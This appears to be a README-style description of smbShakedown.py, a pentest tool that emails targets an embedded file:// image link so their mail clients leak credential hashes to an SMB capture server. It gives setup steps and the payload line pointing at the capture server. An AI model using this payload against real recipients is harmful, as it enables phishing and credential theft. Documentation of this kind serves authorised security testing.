A simplified SMB Email Client Attack script used for External/Internal pentests.

A simplified SMB Email Client Attack script used for External/Internal pentests.

A simplified SMB Email Client Attack script used for External/Internal pentests.
TO DO:
+ SMTP Anonymous Auth option
+ Add smtplib error handling
+ Option to automagically launch MSF Console (auxiliary/server/capture/smb)
+ Multiple recipient address support.
+ SMTP local server option
+ Create forked version.

* External Pentest:
Virtual Private Server (VPS) recommended.
If behind a firewall be sure to enable port forwarding for your SMB Capture Server.

1.Configure SMTP Relay server address.

2.Enter SMTP Relay server credentials. (anonymous connections not yet supported.)

3.Configure “from” and “to” addresses.

4.Enter SMBCapture Server IP address, so it can be placed in body of email
EX: <img src=file://127.0.0.1/image/foo.gif>
*Verify this is the external IP address*

5.SMBCapture Server does not have to be hosted locally.
EX:(smbShakedown.py script can be ran locally on one system and a SMBCapture server can be hosted somewhere else like on a VPS server.

example run from VPS

example run from VPS

* Internal Pentest
1.Configure SMTP Relay server address or your own locally hosted SMTP Server. (Looking into intergrated support.)
<Does the client’s Email server support relaying?>

2.Enter SMTP Relay server credentials. (anonymous connections not yet supported.)

3.Configure “from” and “to” addresses.

4.Enter SMBCapture Server IP address, so it can be placed in body of email
EX: <img src=file://127.0.0.1/image/foo.gif>

5.SMBCapture Server can be hosted locally when testing internal network.
(Will add in support to automatically launch MSF Console with auxiliary/server/capture/smb)

So Simple for Use and download it from git:

Source: https://github.com/NickSanzotta